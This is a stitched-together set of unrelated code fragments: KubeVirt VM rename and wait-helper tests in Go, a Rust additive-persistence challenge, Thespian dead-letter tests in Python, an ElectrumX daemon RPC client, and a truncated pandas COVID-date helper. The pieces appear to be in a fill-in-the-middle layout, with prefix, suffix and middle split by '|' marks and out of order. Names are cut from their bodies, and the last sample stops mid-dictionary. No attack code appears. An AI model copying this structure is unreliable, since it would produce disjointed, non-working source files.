Expect(err).ToNot(HaveOccurred())
err = cli.Rename(vm1.Name, &v1.RenameOptions{NewName: vm1.Name + "new"})
Expect(err).To(HaveOccurred())
Expect(err.Error()).To(ContainSubstring("running"))
})
It("should succeed", func() {
err := cli.Rename(vm1.Name, &v1.RenameOptions{NewName: vm1.Name + "new"})
Expect(err).ToNot(HaveOccurred())
Eventually(func() error {
_, err := cli.Get(vm1.Name+"new", &v12.GetOptions{})
return err
}).Should(BeNil())
_, err = cli.Get(vm1.Name, &v12.GetOptions{})
Expect(err).To(HaveOccurred())
Expect(err.Error()).To(ContainSubstring("not found"))
})
})
})
})
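// getExpectedPodName derives the expected virt-launcher pod name prefix for a VM: the VM
// name is truncated so that the prefix, the name, and the 5-character generated suffix fit
// within the 63-character limit used below (descriptive note added here, not from upstream docs).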
func getExpectedPodName(vm *v1.VirtualMachine) string {
maxNameLength := 63
podNamePrefix := "virt-launcher-"
podGeneratedSuffixLen := 5
charCountFromName := maxNameLength - len(podNamePrefix) - podGeneratedSuffixLen
expectedPodName := fmt.Sprintf(fmt.Sprintf("%s%%.%ds", podNamePrefix, charCountFromName), vm.GetName())
return expectedPodName
}
func NewRandomVirtualMachineWithRunStrategy(vmi *v1.VirtualMachineInstance, runStrategy v1.VirtualMachineRunStrategy) *v1.VirtualMachine {
vm := tests.NewRandomVirtualMachine(vmi, false)
vm.Spec.Running = nil
vm.Spec.RunStrategy = &runStrategy
return vm
}
func waitForVMIStart(virtClient kubecli.KubevirtClient, vmi *v1.VirtualMachineInstance) {
Eventually(func() v1.VirtualMachineInstancePhase {
newVMI, err := virtClient.VirtualMachineInstance(vmi.Namespace).Get(vmi.GetName(), &v12.GetOptions{})
if err != nil {
if !errors.IsNotFound(err) {
Expect(err).ToNot(HaveOccurred())
}
return v1.Unknown
}
return newVMI.Status.Phase
}, 120*time.Second, 1*time.Second).Should(Equal(v1.Running), "VMI never reached the Running phase")
}
func waitForNewVMI(virtClient kubecli.KubevirtClient, vmi *v1.VirtualMachineInstance) {
Eventually(func() bool {
newVMI, err := virtClient.VirtualMachineInstance(vmi.Namespace).Get(vmi.GetName(), &v12.GetOptions{})
if err != nil {
if !errors.IsNotFound(err) {
Expect(err).ToNot(HaveOccurred())
}
return false
}
return (newVMI.Status.Phase == v1.Scheduling) || (newVMI.Status.Phase == v1.Running)
}, 120*time.Second, 1*time.Second).Should(BeTrue(), "New VMI was not created")
}
func waitForResourceDeletion(k8sClient string, resourceType string, resourceName string) {
Eventually(func() bool {
stdout, _, err := tests.RunCommand(k8sClient, "get", resourceType)
Expect(err).ToNot(HaveOccurred())
return strings.Contains(stdout, resourceName)
}, 120*time.Second, 1*time.Second).Should(BeFalse(), "Resource was not deleted")
} | Eventually(func() bool {
virtualMachine, err = virtClient.VirtualMachine(virtualMachine.Namespace).Get(virtualMachine.Name, &v12.GetOptions{})
Expect(err).ToNot(HaveOccurred())
return virtualMachine.Status.Ready |
lib.rs | use core::{slog, Challenge, Difficulty, Error, Info, Logger};
use smallvec::SmallVec;
use std::iter::Sum;
pub const TITLE: &str = "Additive Persistence";
pub const LINK: &str = "https://www.reddit.com/r/dailyprogrammer/comments/akv6z4/20190128_challenge_374_easy_additive_persistence/?utm_source=share&utm_medium=web2x";
pub const DESCRIPTION: &str = "# Description
Inspired by [this tweet](https://twitter.com/fermatslibrary/status/1089883307473543170), today's challenge is to calculate the [*additive persistence*](http://mathworld.wolfram.com/AdditivePersistence.html) of a number, defined as how many loops you have to do summing its digits until you get a single digit number. Take an integer *N*:
1. Add its digits
2. Repeat until the result has 1 digit
The total number of iterations is the additive persistence of *N*.
Your challenge today is to implement a function that calculates the additive persistence of a number.
# Examples
```
13 -> 1
1234 -> 2
9876 -> 2
199 -> 3
```
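For instance, worked by hand: 199 -> 1+9+9 = 19 -> 1+9 = 10 -> 1+0 = 1, which takes 3 summing steps, so the additive persistence of 199 is 3 (matching the last example above).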
# Bonus
The really easy solution converts the number to a string and iterates over it. Try it without making the number a string, decomposing it into digits while keeping it a number.
On some platforms and languages, if you try and find ever larger persistence values you'll quickly learn about your platform's big integer interfaces (e.g. 64 bit numbers).";
#[derive(Debug, Clone, PartialEq)]
pub struct Easy374 {
info: Info,
}
impl Default for Easy374 {
fn default() -> Easy374 { | Easy374 {
info: Info {
title: TITLE.into(),
link: LINK.into(),
description: DESCRIPTION.into(),
number: 374,
difficulty: Difficulty::Easy,
},
}
}
}
impl Challenge for Easy374 {
fn info(&self) -> &Info {
&self.info
}
fn execute(&self, logger: &Logger) -> Result<(), Error> {
let numbers: Vec<u64> = vec![
13,
1234,
9876,
0,
10,
19,
199,
1234567890,
12345678901234567890,
];
for number in numbers {
let ap = additive_persistence(number);
slog::info!(logger, ""; "number" => number, "additive-persistence" => ap);
}
Ok(())
}
}
/// Calculate a number's *additive persistence*.
pub fn additive_persistence<N: Number>(n: N) -> u32 {
let mut count = 0;
let mut n = n;
while n.two_or_more_digits() {
n = sum_digits(n);
count += 1;
}
count
}
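// Hand-checked usage sketch (added for illustration, not part of the original source):
//   additive_persistence(199_u32) == 3   // 199 -> 19 -> 10 -> 1
//   additive_persistence(7_u32)   == 0   // already a single digit, so the loop never runs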
fn sum_digits<N: Number>(n: N) -> N {
digits(n).map(N::from_u8).sum()
}
/// A digit buffer.
pub type Buffer = SmallVec<[u8; 8]>;
/// Get an iterator over the digits in a number.
pub fn digits<N: Number>(n: N) -> impl Iterator<Item = u8> {
let mut buffer = Buffer::new();
n.digits_rec(&mut buffer);
buffer.into_iter()
}
/// A generic number for the purposes of calculating *Additive Persistence*.
pub trait Number: Sum {
/// Push the digits of this number onto the buffer.
fn digits_rec(&self, buffer: &mut Buffer);
/// Does this number have 2 or more digits?
fn two_or_more_digits(&self) -> bool;
fn from_u8(n: u8) -> Self;
}
macro_rules! impl_number {
($ty:ty) => {
impl $crate::Number for $ty {
#[allow(unused_comparisons)]
fn digits_rec(&self, buffer: &mut Buffer) {
debug_assert!(*self >= 0,
"It doesn't make sense to find the digits in a negative number");
if *self >= 10 {
(*self/10).digits_rec(buffer);
}
let digit = *self % 10;
buffer.push(digit as u8);
}
fn two_or_more_digits(&self) -> bool {
*self >= 10
}
fn from_u8(n: u8) -> Self {
n as $ty
}
}
};
( $( $ty:ty ),*) => {
$(
impl_number!($ty);
)*
}
}
impl_number!(u8, u16, u32, u64);
#[cfg(test)]
mod tests {
use super::*;
#[test]
fn example_values() {
let inputs = vec![(13_u32, 1), (1234, 2), (9876, 2), (199, 3)];
for (input, should_be) in inputs {
let got = additive_persistence(input);
assert_eq!(got, should_be, "for {}", input);
}
}
#[test]
fn get_number_digits() {
let inputs: Vec<(u32, &[u8])> = vec![
(0, &[0]),
(10, &[1, 0]),
(111, &[1, 1, 1]),
(101010, &[1, 0, 1, 0, 1, 0]),
];
for (input, should_be) in inputs {
let got: Vec<_> = digits(input).collect();
assert_eq!(got, should_be);
}
}
} | |
test_deadLettering.py | """Verify DeadLetter handling behavior.
Current behavior is that an Actor may register for DeadLetter
handling. If it is registered, any message sent to an Actor that is
no longer present will be redirected to the registered DeadLetter actor
(in its original form).
On exit of the DeadLetter handling Actor, the system reverts to the
default where dead letters are discarded.
If another Actor registers for DeadLetter handling, the new
registration will supersede the old registration. The original
handler is not aware of this, and will no longer receive DeadLetters,
even if the new handler de-registers.
Dead letters are handled by the local ActorSystem. Even if the parent
of an Actor is located in a separate system, the DeadLetter handler is
in the local System.
"""
import time
from thespian.actors import *
from thespian.test import *
from datetime import timedelta
ASK_WAIT = timedelta(seconds=15)
dead_routing_wait = lambda: inTestDelay(timedelta(milliseconds=125))
actor_exit_wait = lambda: inTestDelay(timedelta(milliseconds=50))
actor_create_wait = lambda: inTestDelay(timedelta(milliseconds=750))
actor_do_stuff_wait = lambda: inTestDelay(timedelta(milliseconds=500))
class DLHandler(Actor):
def receiveMessage(self, msg, sender):
if msg == 'Start':
self.handleDeadLetters()
elif msg == 'Stop':
self.handleDeadLetters(False)
elif msg == 'Count':
self.send(sender, getattr(self, 'numDeadLetters', 0))
elif isinstance(msg, ActorExitRequest):
pass
else:
# got a dead letter
self.numDeadLetters = getattr(self, 'numDeadLetters', 0) + 1
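# Minimal registration sketch (illustrative only; the ActorSystem base name below is an
# assumption and is not part of this test suite):
#
#   asys = ActorSystem('multiprocTCPBase')
#   dl = asys.createActor(DLHandler)
#   asys.tell(dl, 'Start')                 # DLHandler calls self.handleDeadLetters()
#   pawn = asys.createActor(DLHandler)
#   asys.tell(pawn, ActorExitRequest())    # kill the target actor
#   asys.tell(pawn, 'orphaned message')    # now routed to `dl` as a dead letter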
class DLParent(Actor):
def receiveMessage(self, msg, sender):
if not isinstance(msg, ActorSystemMessage): # or isinstance(msg, DeadEnvelope):
if not getattr(self, 'dlchild', None):
self.dlchild = self.createActor(DLHandler)
if self.dlchild == sender:
# Upward
self.send(self.lastSender, msg)
else:
# Downward
self.lastSender = sender
if msg == 'exit please':
self.send(self.dlchild, ActorExitRequest())
else:
self.send(self.dlchild, msg)
# UDP does not provide the ability to validate delivery of messages
# (outside of higher-level validation handshakes), so this system base
# cannot support Dead Lettering (as documented).
class TestFuncDeadLettering(object):
def checkNewDLCount(self, asys, handlerAddress, oldCount):
#asys = ActorSystem()
cnt = asys.ask(handlerAddress, 'Count', ASK_WAIT)
retries = 30
while cnt <= oldCount and retries:
retries -= 1
dead_routing_wait()
cnt = asys.ask(handlerAddress, 'Count', ASK_WAIT)
assert cnt > oldCount
return cnt
def test01_registerDeadLetter(self, asys, run_unstable_tests):
unstable_test(run_unstable_tests, asys, 'multiprocUDPBase')
handler = asys.createActor(DLHandler)
assert 0 == asys.ask(handler, 'Count', ASK_WAIT)
asys.tell(handler, 'Start')
assert 0 == asys.ask(handler, 'Count', ASK_WAIT)
asys.tell(handler, 'Stop')
assert 0 == asys.ask(handler, 'Count', ASK_WAIT)
def test11_registerDeadLetterSubActor(self, asys, run_unstable_tests):
|
def test02_GetDeadLetter(self, asys, run_unstable_tests):
unstable_test(run_unstable_tests, asys, 'multiprocUDPBase')
handler = asys.createActor(DLHandler)
assert 0 == asys.ask(handler, 'Count', ASK_WAIT)
asys.tell(handler, 'Start')
cnt = self.checkNewDLCount(asys, handler, -1)
pawn = asys.createActor(DLHandler)
asys.tell(pawn, ActorExitRequest())
actor_exit_wait()
asys.tell(pawn, 'hello')
cnt = self.checkNewDLCount(asys, handler, cnt)
asys.tell(pawn, 'hi')
cnt = self.checkNewDLCount(asys, handler, cnt)
asys.tell(handler, 'Stop')
actor_exit_wait()
asys.tell(pawn, 'another')
assert cnt == asys.ask(handler, 'Count', ASK_WAIT)
asys.tell(pawn, 'and another')
assert cnt == asys.ask(handler, 'Count', ASK_WAIT)
def test12_GetDeadLetterSubActor(self, asys, run_unstable_tests):
unstable_test(run_unstable_tests, asys, 'multiprocUDPBase')
handler = asys.createActor(DLParent)
r = asys.ask(handler, 'Count', ASK_WAIT)
assert 0 == r
asys.tell(handler, 'Start')
cnt = self.checkNewDLCount(asys, handler, -1)
pawn = asys.createActor(DLParent)
asys.tell(pawn, 'exit please')
actor_create_wait()
asys.tell(pawn, 'hello')
cnt = self.checkNewDLCount(asys, handler, cnt)
asys.tell(pawn, 'hi')
cnt = self.checkNewDLCount(asys, handler, cnt)
asys.tell(handler, 'Stop')
actor_exit_wait()
asys.tell(pawn, 'another')
r = asys.ask(handler, 'Count', ASK_WAIT)
assert cnt == r
asys.tell(pawn, 'and another')
r = asys.ask(handler, 'Count', ASK_WAIT)
assert cnt == r
def test03_DLRegisterOnlyOnce(self, asys, run_unstable_tests):
unstable_test(run_unstable_tests, asys, 'multiprocUDPBase')
handler = asys.createActor(DLHandler)
assert 0 == asys.ask(handler, 'Count', ASK_WAIT)
asys.tell(handler, 'Start')
cnt = self.checkNewDLCount(asys, handler, -1)
# Create another actor and shut it down so we can capture its dead letters
pawn = asys.createActor(DLHandler)
asys.tell(pawn, ActorExitRequest())
actor_do_stuff_wait()
# Send a couple of messages and verify they are each passed to the dead letter handler
asys.tell(pawn, 'hello')
cnt = self.checkNewDLCount(asys, handler, cnt)
asys.tell(pawn, 'hi')
cnt = self.checkNewDLCount(asys, handler, cnt)
# Another start has no effect; remains the dead letter handler.
asys.tell(handler, 'Start')
actor_do_stuff_wait()
# Send another couple of messages to the dead actor and verify dead letter receipt.
asys.tell(pawn, 'another')
cnt = self.checkNewDLCount(asys, handler, cnt)
asys.tell(pawn, 'and another')
cnt = self.checkNewDLCount(asys, handler, cnt)
def test13_DLRegisterOnlyOnce(self, asys, run_unstable_tests):
unstable_test(run_unstable_tests, asys, 'multiprocUDPBase')
handler = asys.createActor(DLParent)
assert 0 == asys.ask(handler, 'Count', ASK_WAIT)
asys.tell(handler, 'Start')
cnt = self.checkNewDLCount(asys, handler, -1)
# Create another actor and shut it down so we can capture its dead letters
pawn = asys.createActor(DLParent)
asys.tell(pawn, ActorExitRequest())
actor_exit_wait()
# Send a couple of messages and verify they are each passed to the dead letter handler
asys.tell(pawn, 'hello')
cnt = self.checkNewDLCount(asys, handler, cnt)
asys.tell(pawn, 'hi')
cnt = self.checkNewDLCount(asys, handler, cnt)
# Another start has no effect; remains the dead letter handler.
asys.tell(handler, 'Start')
actor_do_stuff_wait()
# Send another couple of messages to the dead actor and verify dead letter receipt.
asys.tell(pawn, 'another')
cnt = self.checkNewDLCount(asys, handler, cnt)
asys.tell(pawn, 'and another')
cnt = self.checkNewDLCount(asys, handler, cnt)
def test04_DLMultipleHandlers(self, asys, run_unstable_tests):
unstable_test(run_unstable_tests, asys, 'multiprocUDPBase')
handler = asys.createActor(DLHandler)
assert 0 == asys.ask(handler, 'Count', ASK_WAIT)
asys.tell(handler, 'Start')
cnt = self.checkNewDLCount(asys, handler, -1)
pawn = asys.createActor(DLHandler)
asys.tell(pawn, ActorExitRequest())
actor_exit_wait()
asys.tell(pawn, 'hello')
cnt = self.checkNewDLCount(asys, handler, cnt)
asys.tell(pawn, 'hi')
cnt = self.checkNewDLCount(asys, handler, cnt)
handler2 = asys.createActor(DLHandler)
asys.tell(handler2, 'Start')
actor_do_stuff_wait()
assert cnt == asys.ask(handler, 'Count', ASK_WAIT)
assert 0 == asys.ask(handler2, 'Count', ASK_WAIT)
cnt2 = self.checkNewDLCount(asys, handler2, -1)
asys.tell(pawn, 'another')
cnt2 = self.checkNewDLCount(asys, handler2, cnt2)
assert cnt == asys.ask(handler, 'Count', ASK_WAIT)
asys.tell(pawn, 'and another')
cnt2 = self.checkNewDLCount(asys, handler2, cnt2)
assert cnt == asys.ask(handler, 'Count', ASK_WAIT)
asys.tell(handler, 'Stop') # no effect
actor_do_stuff_wait()
asys.tell(pawn, 'more messages')
cnt2 = self.checkNewDLCount(asys, handler2, cnt2)
assert cnt == asys.ask(handler, 'Count', ASK_WAIT)
asys.tell(pawn, 'more messages again')
cnt2 = self.checkNewDLCount(asys, handler2, cnt2)
assert cnt == asys.ask(handler, 'Count', ASK_WAIT)
asys.tell(handler2, 'Stop')
actor_do_stuff_wait()
assert cnt == asys.ask(handler, 'Count', ASK_WAIT)
assert cnt2 == asys.ask(handler2, 'Count', ASK_WAIT)
asys.tell(pawn, 'more messages repeated')
actor_do_stuff_wait()
assert cnt == asys.ask(handler, 'Count', ASK_WAIT)
assert cnt2 == asys.ask(handler2, 'Count', ASK_WAIT)
asys.tell(pawn, 'more messages again repeated')
actor_do_stuff_wait()
assert cnt == asys.ask(handler, 'Count', ASK_WAIT)
assert cnt2 == asys.ask(handler2, 'Count', ASK_WAIT)
asys.tell(handler, 'Start')
actor_do_stuff_wait()
assert cnt == asys.ask(handler, 'Count', ASK_WAIT)
assert cnt2 == asys.ask(handler2, 'Count', ASK_WAIT)
asys.tell(pawn, 'more messages repeated reprised')
cnt = self.checkNewDLCount(asys, handler, cnt)
assert cnt2 == asys.ask(handler2, 'Count', ASK_WAIT)
asys.tell(pawn, 'more messages again repeated reprised')
cnt = self.checkNewDLCount(asys, handler, cnt)
assert cnt2 == asys.ask(handler2, 'Count', ASK_WAIT)
def test14_DLMultipleHandlers(self, asys, run_unstable_tests):
unstable_test(run_unstable_tests, asys, 'multiprocUDPBase')
handler = asys.createActor(DLParent)
assert 0 == asys.ask(handler, 'Count', ASK_WAIT)
asys.tell(handler, 'Start')
cnt = self.checkNewDLCount(asys, handler, -1)
pawn = asys.createActor(DLParent)
asys.tell(pawn, ActorExitRequest())
actor_exit_wait()
asys.tell(pawn, 'hello')
cnt = self.checkNewDLCount(asys, handler, cnt)
asys.tell(pawn, 'hi')
cnt = self.checkNewDLCount(asys, handler, cnt)
handler2 = asys.createActor(DLParent)
asys.tell(handler2, 'Start')
actor_do_stuff_wait()
assert cnt == asys.ask(handler, 'Count', ASK_WAIT)
assert 0 == asys.ask(handler2, 'Count', ASK_WAIT)
cnt2 = self.checkNewDLCount(asys, handler2, -1)
asys.tell(pawn, 'another')
cnt2 = self.checkNewDLCount(asys, handler2, cnt2)
assert cnt == asys.ask(handler, 'Count', ASK_WAIT)
asys.tell(pawn, 'and another')
cnt2 = self.checkNewDLCount(asys, handler2, cnt2)
assert cnt == asys.ask(handler, 'Count', ASK_WAIT)
asys.tell(handler, 'Stop') # no effect
actor_do_stuff_wait()
asys.tell(pawn, 'more messages')
cnt2 = self.checkNewDLCount(asys, handler2, cnt2)
assert cnt == asys.ask(handler, 'Count', ASK_WAIT)
asys.tell(pawn, 'more messages again')
cnt2 = self.checkNewDLCount(asys, handler2, cnt2)
assert cnt == asys.ask(handler, 'Count', ASK_WAIT)
asys.tell(handler2, 'Stop')
actor_do_stuff_wait()
assert cnt == asys.ask(handler, 'Count', ASK_WAIT)
assert cnt2 == asys.ask(handler2, 'Count', ASK_WAIT)
asys.tell(pawn, 'more messages repeated')
actor_do_stuff_wait()
assert cnt == asys.ask(handler, 'Count', ASK_WAIT)
assert cnt2 == asys.ask(handler2, 'Count', ASK_WAIT)
asys.tell(pawn, 'more messages again repeated')
actor_do_stuff_wait()
assert cnt == asys.ask(handler, 'Count', ASK_WAIT)
assert cnt2 == asys.ask(handler2, 'Count', ASK_WAIT)
asys.tell(handler, 'Start')
actor_do_stuff_wait()
assert cnt == asys.ask(handler, 'Count', ASK_WAIT)
assert cnt2 == asys.ask(handler2, 'Count', ASK_WAIT)
asys.tell(pawn, 'more messages repeated reprised')
cnt = self.checkNewDLCount(asys, handler, cnt)
assert cnt2 == asys.ask(handler2, 'Count', ASK_WAIT)
asys.tell(pawn, 'more messages again repeated reprised')
cnt = self.checkNewDLCount(asys, handler, cnt)
assert cnt2 == asys.ask(handler2, 'Count', ASK_WAIT)
def test05_DLAutoRemoval(self, asys, run_unstable_tests):
unstable_test(run_unstable_tests, asys, 'multiprocUDPBase')
handler = asys.createActor(DLHandler)
assert 0 == asys.ask(handler, 'Count', ASK_WAIT)
asys.tell(handler, 'Start')
handler2 = asys.createActor(DLHandler)
asys.tell(handler2, 'Start')
assert 0 == asys.ask(handler, 'Count', ASK_WAIT)
assert 0 == asys.ask(handler2, 'Count', ASK_WAIT)
# Create actor and kill it so messages to it will be dead-letter routed.
pawn = asys.createActor(DLHandler)
asys.tell(pawn, ActorExitRequest())
actor_exit_wait()
# Send a message and make sure the later dead-letter handler receives it
cnt = 0
cnt2 = 0
asys.tell(pawn, 'hello')
cnt2 = self.checkNewDLCount(asys, handler2, cnt2)
assert cnt == asys.ask(handler, 'Count', ASK_WAIT)
# Again, to ensure no round-robining is occurring
asys.tell(pawn, 'hi')
cnt2 = self.checkNewDLCount(asys, handler2, cnt2)
assert cnt == asys.ask(handler, 'Count', ASK_WAIT)
# Now remove dead letter handler; ensure dead letters are dropped
asys.tell(handler2, ActorExitRequest())
actor_exit_wait()
assert 0 == asys.ask(handler, 'Count', ASK_WAIT)
asys.tell(pawn, 'another')
actor_do_stuff_wait()
assert 0 == asys.ask(handler, 'Count', ASK_WAIT)
# Tell first dead letter handler to re-register
asys.tell(handler, 'Start')
# n.b. tell or ask might create temporary actor, so can't assume startnum == 0
cnt = asys.ask(handler, 'Count', ASK_WAIT)
# Verify first dead letter handler is getting dead letters again
asys.tell(pawn, 'another again')
cnt = self.checkNewDLCount(asys, handler, cnt)
def test15_DLAutoRemoval(self, asys, run_unstable_tests):
unstable_test(run_unstable_tests, asys, 'multiprocUDPBase')
handler = asys.createActor(DLParent)
assert 0 == asys.ask(handler, 'Count', ASK_WAIT)
asys.tell(handler, 'Start')
handler2 = asys.createActor(DLParent)
asys.tell(handler2, 'Start')
actor_do_stuff_wait()
assert 0 == asys.ask(handler, 'Count', ASK_WAIT)
assert 0 == asys.ask(handler2, 'Count', ASK_WAIT)
# Create actor and kill it so messages to it will be dead-letter routed.
pawn = asys.createActor(DLParent)
asys.tell(pawn, ActorExitRequest())
actor_exit_wait()
# Send a message and make sure the later dead-letter handler receives it
cnt = 0
cnt2 = 0
asys.tell(pawn, 'hello')
cnt2 = self.checkNewDLCount(asys, handler2, cnt2)
assert cnt == asys.ask(handler, 'Count', ASK_WAIT)
# Again, to ensure no round-robining is occurring
asys.tell(pawn, 'hi')
cnt2 = self.checkNewDLCount(asys, handler2, cnt2)
assert cnt == asys.ask(handler, 'Count', ASK_WAIT)
# Now remove dead letter handler; ensure dead letters are dropped
asys.tell(handler2, ActorExitRequest())
actor_exit_wait()
assert 0 == asys.ask(handler, 'Count', ASK_WAIT)
asys.tell(pawn, 'another')
actor_do_stuff_wait()
assert 0 == asys.ask(handler, 'Count', ASK_WAIT)
# Tell first dead letter handler to re-register
asys.tell(handler, 'Start')
actor_do_stuff_wait()
# n.b. tell or ask might create temporary actor, so can't assume startnum == 0
cnt = asys.ask(handler, 'Count', ASK_WAIT)
# Verify first dead letter handler is getting dead letters again
asys.tell(pawn, 'another again')
cnt = self.checkNewDLCount(asys, handler, cnt)
#KWQ: test multiple actor systems
| unstable_test(run_unstable_tests, asys, 'multiprocUDPBase')
handler = asys.createActor(DLParent)
assert 0 == asys.ask(handler, 'Count', ASK_WAIT)
asys.tell(handler, 'Start')
assert 0 == asys.ask(handler, 'Count', ASK_WAIT)
asys.tell(handler, 'Stop')
assert 0 == asys.ask(handler, 'Count', ASK_WAIT) |
daemon.py | # Copyright (c) 2016-2017, Neil Booth
#
# All rights reserved.
#
# See the file "LICENCE" for information about the copyright
# and warranty status of this software.
'''Class for handling asynchronous connections to a blockchain
daemon.'''
import asyncio
import itertools
import json
import time
import aiohttp
from aiorpcx import JSONRPC
from electrumx.lib.util import hex_to_bytes, class_logger
class DaemonError(Exception):
'''Raised when the daemon returns an error in its results.'''
class WarmingUpError(Exception):
'''Internal - when the daemon is warming up.'''
class ServiceRefusedError(Exception):
'''Internal - when the daemon doesn't provide a JSON response, only an HTTP error, for
some reason.'''
class Daemon(object):
'''Handles connections to a daemon at the given URL.'''
WARMING_UP = -28
id_counter = itertools.count()
def __init__(self, coin, url, *, max_workqueue=10, init_retry=0.25, max_retry=4.0):
self.coin = coin
self.logger = class_logger(__name__, self.__class__.__name__)
self.url_index = None
self.urls = []
self.set_url(url)
# Limit concurrent RPC calls to this number.
# See DEFAULT_HTTP_WORKQUEUE in bitcoind, which is typically 16
self.workqueue_semaphore = asyncio.Semaphore(value=max_workqueue)
self.init_retry = init_retry
self.max_retry = max_retry
self._height = None
self.available_rpcs = {}
self.session = None
async def __aenter__(self):
self.session = aiohttp.ClientSession(connector=self.connector())
return self
async def __aexit__(self, exc_type, exc_value, traceback):
await self.session.close()
self.session = None
def connector(self):
return None
def set_url(self, url):
        '''Set the URLs from the given comma-separated string and switch to the first one.'''
urls = url.split(',')
urls = [self.coin.sanitize_url(url) for url in urls]
for n, url in enumerate(urls):
status = '' if n else ' (current)'
logged_url = self.logged_url(url)
self.logger.info(f'daemon #{n + 1} at {logged_url}{status}')
self.url_index = 0
self.urls = urls
def current_url(self):
'''Returns the current daemon URL.'''
return self.urls[self.url_index]
def logged_url(self, url=None):
'''The host and port part, for logging.'''
url = url or self.current_url()
return url[url.rindex('@') + 1:]
def failover(self):
'''Call to fail-over to the next daemon URL.
Returns False if there is only one, otherwise True.
'''
if len(self.urls) > 1:
self.url_index = (self.url_index + 1) % len(self.urls)
self.logger.info(f'failing over to {self.logged_url()}')
return True
return False
async def _send_data(self, data):
async with self.workqueue_semaphore:
async with self.session.post(self.current_url(), data=data) as resp:
kind = resp.headers.get('Content-Type', None)
if kind == 'application/json':
return await resp.json()
text = await resp.text()
text = text.strip() or resp.reason
raise ServiceRefusedError(text)
async def _send(self, payload, processor):
'''Send a payload to be converted to JSON.
        Handles temporary connection issues. Daemon response errors
        are raised through DaemonError.
'''
def log_error(error):
nonlocal last_error_log, retry
now = time.time()
if now - last_error_log > 60:
last_error_log = now
self.logger.error(f'{error}. Retrying occasionally...')
if retry == self.max_retry and self.failover():
retry = 0
on_good_message = None
last_error_log = 0
data = json.dumps(payload)
retry = self.init_retry
while True:
try:
result = await self._send_data(data)
result = processor(result)
if on_good_message:
self.logger.info(on_good_message)
return result
except asyncio.TimeoutError:
log_error('timeout error')
except aiohttp.ServerDisconnectedError:
log_error('disconnected')
on_good_message = 'connection restored'
except ConnectionResetError:
log_error('connection reset')
on_good_message = 'connection restored'
except aiohttp.ClientConnectionError:
log_error('connection problem - check your daemon is running')
on_good_message = 'connection restored'
except aiohttp.ClientError as e:
log_error(f'daemon error: {e}')
on_good_message = 'running normally'
except ServiceRefusedError as e:
log_error(f'daemon service refused: {e}')
on_good_message = 'running normally'
except WarmingUpError:
log_error('starting up checking blocks')
on_good_message = 'running normally'
await asyncio.sleep(retry)
retry = max(min(self.max_retry, retry * 2), self.init_retry)
async def _send_single(self, method, params=None):
'''Send a single request to the daemon.'''
def processor(result):
err = result['error']
if not err:
return result['result']
if err.get('code') == self.WARMING_UP:
raise WarmingUpError
raise DaemonError(err)
payload = {'method': method, 'id': next(self.id_counter)}
if params:
payload['params'] = params
return await self._send(payload, processor)
async def _send_vector(self, method, params_iterable, replace_errs=False):
'''Send several requests of the same method.
The result will be an array of the same length as params_iterable.
If replace_errs is true, any item with an error is returned as None,
otherwise an exception is raised.'''
def processor(result):
errs = [item['error'] for item in result if item['error']]
if any(err.get('code') == self.WARMING_UP for err in errs):
raise WarmingUpError
if not errs or replace_errs:
return [item['result'] for item in result]
raise DaemonError(errs)
payload = [{'method': method, 'params': p, 'id': next(self.id_counter)}
for p in params_iterable]
if payload:
return await self._send(payload, processor)
return []
async def _is_rpc_available(self, method):
'''Return whether given RPC method is available in the daemon.
Results are cached and the daemon will generally not be queried with
the same method more than once.'''
available = self.available_rpcs.get(method)
if available is None:
available = True
try:
await self._send_single(method)
except DaemonError as e:
err = e.args[0]
error_code = err.get("code")
available = error_code != JSONRPC.METHOD_NOT_FOUND
self.available_rpcs[method] = available
return available
async def | (self, first, count):
        '''Return the hex hashes of count blocks starting at height first.'''
params_iterable = ((h, ) for h in range(first, first + count))
return await self._send_vector('getblockhash', params_iterable)
async def deserialised_block(self, hex_hash):
'''Return the deserialised block with the given hex hash.'''
return await self._send_single('getblock', (hex_hash, True))
async def raw_blocks(self, hex_hashes):
'''Return the raw binary blocks with the given hex hashes.'''
params_iterable = ((h, False) for h in hex_hashes)
blocks = await self._send_vector('getblock', params_iterable)
# Convert hex string to bytes
return [hex_to_bytes(block) for block in blocks]
async def mempool_hashes(self):
'''Update our record of the daemon's mempool hashes.'''
return await self._send_single('getrawmempool')
async def getnetworkinfo(self):
'''Return the result of the 'getnetworkinfo' RPC call.'''
return await self._send_single('getnetworkinfo')
async def getrawtransaction(self, hex_hash, verbose=False):
'''Return the serialized raw transaction with the given hash.'''
# Cast to int because some coin daemons are old and require it
return await self._send_single('getrawtransaction',
(hex_hash, int(verbose)))
async def getrawtransactions(self, hex_hashes, replace_errs=True):
'''Return the serialized raw transactions with the given hashes.
Replaces errors with None by default.'''
params_iterable = ((hex_hash, 0) for hex_hash in hex_hashes)
txs = await self._send_vector('getrawtransaction', params_iterable,
replace_errs=replace_errs)
# Convert hex strings to bytes
return [hex_to_bytes(tx) if tx else None for tx in txs]
async def broadcast_transaction(self, raw_tx):
'''Broadcast a transaction to the network.'''
return await self._send_single('sendrawtransaction', (raw_tx, ))
async def height(self):
'''Query the daemon for its current height.'''
self._height = await self._send_single('getblockcount')
return self._height
def cached_height(self):
'''Return the cached daemon height.
If the daemon has not been queried yet this returns None.'''
return self._height
| block_hex_hashes |
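A minimal usage sketch of the Daemon class defined above; the coin object and URL are placeholders (any object exposing sanitize_url and a reachable node), not part of the original file.
# Illustrative only: drive the Daemon as an async context manager and issue a few RPCs.
async def poll_daemon(coin, url):
    async with Daemon(coin, url) as daemon:
        height = await daemon.height()                     # 'getblockcount'
        tip_hashes = await daemon.block_hex_hashes(height, 1)  # 'getblockhash' for the tip
        mempool = await daemon.mempool_hashes()            # 'getrawmempool'
        return height, tip_hashes, mempool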
data_prep_helpers.py | #!/usr/bin/env python3
# -*- coding: utf-8 -*-
import pandas as pd
def add_corona_dates(df, index_name, strategy=["during_corona", "no_corona"]):
| """
Inputs
------
strategy : List
division of datetimes based on stages of corona; acceptable strategies
are one of the following (order in list does not matter)
- ['during_corona', 'no_corona']
- ['pre_corona', 'during_corona', 'post_corona']
SOURCE
------
https://github.com/facebook/prophet/issues/1416#issuecomment-618553502
"""
d_corona = {
"BE": [
pd.to_datetime("2020-03-07 00:00:00"),
pd.to_datetime("2020-04-12 23:00:00"),
],
"CH": [
pd.to_datetime("2020-03-07 00:00:00"),
pd.to_datetime("2020-04-12 23:00:00"),
],
"CZ": [
pd.to_datetime("2020-03-14 00:00:00"),
pd.to_datetime("2020-04-12 23:00:00"),
],
"DE": [
pd.to_datetime("2020-03-14 00:00:00"),
pd.to_datetime("2020-04-12 23:00:00"),
],
"ES": [
